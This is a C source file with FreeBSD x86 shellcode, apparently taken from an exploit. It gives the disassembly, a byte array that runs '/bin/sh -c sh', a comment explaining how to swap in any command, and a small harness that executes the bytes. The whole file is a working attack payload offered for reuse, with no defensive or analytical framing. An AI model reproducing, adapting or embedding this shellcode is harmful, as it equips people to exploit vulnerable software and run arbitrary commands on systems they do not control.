/*
        FreeBSD Shellcode
        ripped from a private exploit :)
        
        jmp    0x37
        pop    %esi
        xor    %eax,%eax
        mov    %al,0xfffffffa(%esi)
        mov    %eax,0xfffffff5(%esi)
        mov    %esi,(%esi)
        mov    %esi,0x4(%esi)
        mov    %esi,0x8(%esi)
        addl   $0x10,(%esi)
        addl   $0x18,0x4(%esi)
        addl   $0x1b,0x8(%esi)
        mov    %eax,0xc(%esi)
        mov    %al,0x17(%esi)
        mov    %al,0x1a(%esi)
        mov    %al,0x1d(%esi)
        push   %eax
        push   %esi
        pushl  (%esi)
        mov    $0x3b,%al
        push   %eax
        nop
        lcall  $0x707,$0x1010101
        call   0xc4ffffff
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        add    (%edx),%al
        .string "/bin/sh.-c.sh"
      Replace .sh with .anycommand
*/

char code[]=
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02/bin/sh.-c.sh";

main()
{
  int (*f)();
  f = (int (*)()) code;
  printf("FreeBSD custom shellcode, %d bytes\n", strlen(code));
  (int)(*f)();
}